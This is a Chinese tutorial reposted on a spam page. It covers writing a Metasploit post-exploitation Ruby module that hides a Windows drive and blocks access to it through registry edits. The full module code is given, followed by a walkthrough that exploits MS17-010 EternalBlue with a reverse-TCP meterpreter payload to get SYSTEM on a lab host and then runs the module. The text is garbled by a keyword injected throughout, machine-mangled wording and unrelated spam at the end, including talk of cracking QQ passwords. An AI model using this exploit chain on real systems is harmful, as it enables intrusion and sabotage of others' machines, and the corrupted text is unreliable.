黑客大会2019-手机上能用的黑客软件-关于Metasploit5中的后渗透模块的编写与测试

手机可用的黑客软件-有关Metasploit5中的后渗透模块的编写与检测

后渗透模块，说白了是在取得成功渗透总体目标服务器以后开展实际操作的模块，这类模块能够做到某类或一些特殊的目地。在Metasploit中，模块是文件后缀名为.rb的文档，它是利用Ruby编写的程序流程。文中详细说明了怎样利用Ruby编写掩藏和禁止访问特殊控制器的后渗透模块、怎样在Metasploit中载入该后渗透模块及其怎样在meterpreter中利用该后渗透模块的全过程。

试验自然环境

1.渗透服务器：Kali-Linux-2019.1-vm-amd64

2.总体目标服务器：Windows 黑客大会2019 Server 2008 R2

3.软件版本：Metasploit v5.0.2

编写后渗透模块

1.模块的之一部分以下所显示：

# This module requires Metasploit: https://metasploit.com/download

# This module is used to hide and restrict access to a particular drive

# after you have successfully penetrated a server

require 'rex'

require 'msf/黑客大会2019core'

require 'msf/core/post/windows/registry'

class MetasploitModule < Msf::Post

include Msf::Post::Windows::Registry

def initialize

super(

'Description'=> 'This module is used to hide and restrict access to a particular drive',

'License'=> MSF_LICENSE,

黑客大会2019 'Author'=> 'Neroqi',

)

register_options(

[ OptString.new('DriveCharacter',[true,'Please SET the Drive Character'])],

self.class)

end

Metasploit的模块编写提议从注解刚开始，注解句子以“#”开始，注解可以提高模块的易读性，便捷别人和自身之后的阅读文章应用。

require 黑客大会2019 ‘rex’导入了Metasploit中rex库的全部內容；require ‘msf/core’导入了Metasploit中core库的全部內容；require ‘msf/core/post/windows/registry’导入了registry.rb库文件，用以事后实际操作总体目标服务器的注册表文件。

class MetasploitModule < Msf::Post表示将该模块界定为Post种类，即后渗透模块种类。

方式initialize界定了模块的基本信息及主要参数，在其中register_options应用OptString.new函数定义了一个字符串数组自变量DriveCharacter，用以储存本地磁盘。

2.黑客大会2019模块的第二一部分以下所显示：

def drive_converter(drive)

case drive

when "A"

return 1

when "B"

return 2

when "C"

return 4

when "D"

return 8

when "E"

return 16

when "F"

return 黑客大会2019 32

when "G"

return 64

end

end

这一部分牵涉到本地磁盘掩码的测算全过程。其实不是很难，利用公式计算2^(N-1)就可以，在其中N为本地磁盘英文字母在26个英文声母表中的部位，例如C在声母表中的部位为3，因而回到2^(3-1)=4，别的本地磁盘依此类推。

因为 *** 服务器很有可能外挂软件存储阵列，因而本地磁盘很有可能不仅到英文字母“G” ，这一部分能够自主改动。

3.模块的第三一部分以下所显示：

def run

drive_int = 黑客大会2019 drive_converter(datastore['DriveCharacter'])

registry_path = "HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer"

exists = meterpreter_registry_key_exist?(registry_path)

if exists

print_good("Registry Path Exists, Creating Values Directly!")

meterpreter_registry_setvaldata(registry_path, 黑客大会2019 'NoDrives', drive_int.to_s, 'REG_DWORD', REGISTRY_VIEW_64_BIT)

print_good("Hiding #{datastore['DriveCharacter']}Drive")

meterpreter_registry_setvaldata(registry_path,'NoViewOnDrive', drive_int.to_s,'REG_DWORD', REGISTRY_VIEW_64_BIT)

print_good("Restricting Access to #{黑客大会2019datastore['DriveCharacter']}Drive")

else

print_error("Registry Path Doesn't Exist, Creating Path Firstly!")

registry_createkey(registry_path)

meterpreter_registry_setvaldata(registry_path,'NoDrives', drive_int.to_s,'REG_DWORD', REGISTRY_VIEW_64_BIT)

print_good("Hiding 黑客大会2019 #{datastore['DriveCharacter']}Drive")

meterpreter_registry_setvaldata(registry_path,'NoViewOnDrive', drive_int.to_s,'REG_DWORD', REGISTRY_VIEW_64_BIT)

print_good("Restricting Access to #{datastore['DriveCharacter']}Drive")

end

print_good("Disabled #{datastore['DriveCharacter']}黑客大会2019 Drive Successfully!")

end

registry_path = "HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer"

这里的HKLM表明注册表文件中的HKEY_LOCAL_MACHINE，可是那样缩写是不是行得通？Windows Server 2008 R2的注册表文件是下边那样的啊。

莫急，途径补齐的工作中早已有些人悄悄帮大家干了，在registry.rb库文件中有一段编码完成了此项工作中，实际以下：

def registry_hive_lookup(hive)

case hive

when 'HKCR'

HKEY_LOCAL_MACHINE

when 'HKCU'

HKEY_CURRENT_USER

when 'HKLM'

HKEY_LOCAL_MACHINE

when 'HKU'

HKEY_USERS

when 'HKPD'

HKEY_PERFORMANCE_DATA

黑客大会2019 when 'HKCC'

HKEY_CURRENT_CONFIG

when 'HKDD'

HKEY_DYN_DATA

else

HKEY_LOCAL_MACHINE

end

end

registry_path = "HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer"

这里是在注册表文件的HKLM（HKEY_LOCAL_MACHINE）中，这儿的HKLM还可以改动为HKCU（HKEY_CURRENT_USER）。这二者的差别取决于：在取得成功渗透总体目标服务器以后，若能够获得总体目标服务器的system管理权限，那麼就可以应用HKLM修改系统等级的注册表文件；若只有获得某一客户的管理权限，那麼委屈求全，应用HKCU改动当今客户的注册表文件。

exists 黑客大会2019 = 黑客大会2019 meterpreter_registry_key_exist?(registry_path)

用以分辨总体目标服务器的注册表文件中是不是存有该途径，为下边的if-else句子出示分辨根据。

在Windows中根据建立NoDrives和 NoViewOnDrive这两个注册表值，可以实现隐藏并禁止访问指定盘符。

我们的预期是在meterpreter会话中使用该后渗透模块，于是使用函数meterpreter_registry_setvaldata来设置NoDrives和NoViewOnDrive的值。由于目标主机是64位系统，所以在meterpreter_registry_setvaldata函数中使用的是参数REGISTRY_VIEW_64_BIT；如果目标主机是32位系统，那么使用参数REGISTRY_VIEW_32_BIT。

测试后渗透模块

经过上面的步骤，后渗透模块的编写已经完成，接下来进行模块的测试。

1.将编写好的后渗透模块disable_drive_Neroqi.rb拷贝到如下路径：

/usr/share/metasploit-framework/modules/post/windows/manage

要将模块成功加载到Metasploit中，还需要在msfconsole中reload_all。若模块存在错误，那么msfconsole会返回详细的报错信息，然后根据报错信息相应地去修改自己的代码即可；若模块正确无误，则msfconsole的返回信息如下图所示（reload_all之前是326个post模块，之后是327个post模块）：

2.使用nmap扫描目标主机，nmap命令如下：

root@kali:~# nmap -sV -p - --script vuln --script-args unsafe 192.168黑客大会2019.110.130

发现目标主机中存在ms17_010的漏洞，扫描结果如下图所示：

3.为进一步确认目标主机中的ms17_010漏洞，防止nmap误报，我们在msfconsole中使用auxiliary/scanner/ *** b/ *** b_ms17_010模块，确定ms17_010漏洞是否可以利用，操作如下：

msf5 > use auxiliary/scanner/ *** b/ *** b_ms17_010

msf5 黑客大会2019 auxiliary(scanner/ *** b/ *** b_ms17_010) > set RHOSTS 192.168.110.130

RHOSTS => 192.168.110.130

msf5 auxiliary(scanner/ *** b/ *** b_ms17_010) > run

基本确认该ms17_010漏洞可以利用，确认结果如下图所示：

4.利用exploit/windows/ *** b/ms17_010_eternalblue模块对目标主机进行渗透，建立与目黑客大会2019标主机之间的meterpreter会话，操作如下：

msf5 > use exploit/windows/ *** b/ms17_010_eternalblue

msf5 exploit(windows/ *** b/ms17_010_eternalblue) > set RHOST 192.168.110.130

RHOST => 192.168.110.132

msf5 exploit(windows/ *** b/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp

payload => 黑客大会2019 windows/x64/meterpreter/reverse_tcp

msf5 exploit(windows/ *** b/ms17_010_eternalblue) > set LHOST 192.168.110.132

LHOST => 192.168.110.130

msf5 exploit(windows/ *** b/ms17_010_eternalblue) > set LPORT 8000

LPORT => 8000

msf5 exploit(windows/ *** b/ms17_010_eternalblue) > run

5.可以看到我们取得了目标主机的system权限，如下图所示：

6.对于情况未知的目标主机，可以使用post/windows/gather/forensics/enum_drives模块来枚举分区信息，为后续执行disable_drive_Neroqi.rb模块提供依据，在执行enum_drives模块之前，需要通过background将meterpreter会话转为后台运行，具体操作如下：

meterpreter > background

[*] Backgrounding session 1...

黑客大会2019

msf5 > sessions

Active sessions

===============

Id Name Type Information Connection

-- ---- ---- ----------- ----------

1 meterpreter x64/windows NT AUTHORITY\SYSTEM @ WIN-3E5KJEFP436 黑客大会2019 192.168.110.132:8000 -> 192.168.110.130:49280 (192.168.110.130)

msf5 > use post/windows/gather/forensics/enum_drives

msf5 post(windows/gather/forensics/enum_drives) > show options

Module options (post/windows/gather/forensics/enum_drives):

Name Current Setting Required Description

黑客大会2019 ---- --------------- -------- -----------

MAXDRIVES 10 no Maximum physical drive number

SESSION yes The session to run this module on.

msf5 post(windows/gather/forensics/enum_drives) > set SESSION 1

SESSION => 1

msf5 黑客大会2019 post(windows/gather/forensics/enum_drives) > run

Device Name: Type: Size (bytes):

------------ ----- -------------

\\.\PhysicalDrive0 4702111234474983745

\\.\C: 4702111234474983745

\\.\D: 4702111234黑客大会2019474983745

\\.\E: 4702111234474983745

[*] Post module execution completed

7.在msf中选择编写的后渗透模块disable_drive_Neroqi.rb，设置DriveCharacter和SESSION，其中DriveCharacter为盘符字母（此处设为D），SESSION为转为后台运行的meterpreter会话id（此处id为1），操作如下：

msf5 > use 黑客大会2019 post/windows/manage/disable_drive_Neroqi

msf5 post(windows/manage/disable_drive_Neroqi) > set DriveCharacter D

DriveCharacter => D

msf5 post(windows/manage/disable_drive_Neroqi) > set SESSION 1

SESSION => 1

msf5 post(windows/manage/disable_drive_Neroqi) > run

8.在设置黑客大会2019好模块disable_drive_Neroqi的参数之后，run这个后渗透模块，输出信息如下： 

9.登录到目标主机中，验证攻击是否成功，主机的注册表如下图所示，此时在注册表中NoDrives和NoViewOnDrive已经成功写入：

打开“我的电脑”，可以看到D盘已经消失，如下图所示：

在“磁盘管理”中尝试打开D盘，系统报错，无法访问D盘，如下图所示：

结束语

以上这些，就是关于如何利用Ruby编写后渗透模块、如何加载以及利用后渗透模块的过程，大家有兴趣的话，可以尝试利用Ruby编写自己的渗透模块并且进行相关测试。

*本文原创作者：Neroqi，本文属于FreeBuf原创奖励计划，未经许可禁止转载

写调动工作岗位申请报告的主要内容有:说明自己原本的工作岗位是什么;提出想要调动职位的请求;调动的工作岗位是什。手机上能用的黑客软件

黑客大会2019盗 *** 密码神器你说的是“绝对控制”那部电影里面的情节吧,这个电影里面的这个情节还是有些夸大的成分,但是那个汽车是刷了控制系统以后才出现这样的情况的,这就不是汽车。

也许就高端黑客可以,其他的就别想了。想破解qq密码有键盘记录,字典穷破解,在就窃取tx服务器或者局域内 *** 服务器。前2个都太低端了,成功率低的可怜,都。

网站使用HTTPS后,可以加密客户的到服务器的传输数据,黑客无法监听,篡改,截获传输中的机密数据,所以涉及到隐私信息的网站如银行,电商购物网站都会使用HTTPS。

一个是你中毒了,机器里有黑客的服务端你上线他们就知道.处理办法:从装系统,硬盘要全部格式化.另一个就是黑客利用黑客软件扫描IP无意扫到你的机器,怎么从0开始学黑客

。是时区为东二区的国家。说英语,也许是津巴布韦尼日利亚官方语言为英语。每时每刻世界各地大约正有1800个雷电交作在进行中。它们每秒钟约发出600次闪电,其中有100次袭击地球。乌干达首都坎帕拉和印尼的爪哇岛,是最易受到闪电袭击的地方。

手机上能用的黑客软件塞外狼凶,身旁犬吠,哪个厉害呢?论实力,国外黑客厉害,论威协,身边黑客厉害。

标签：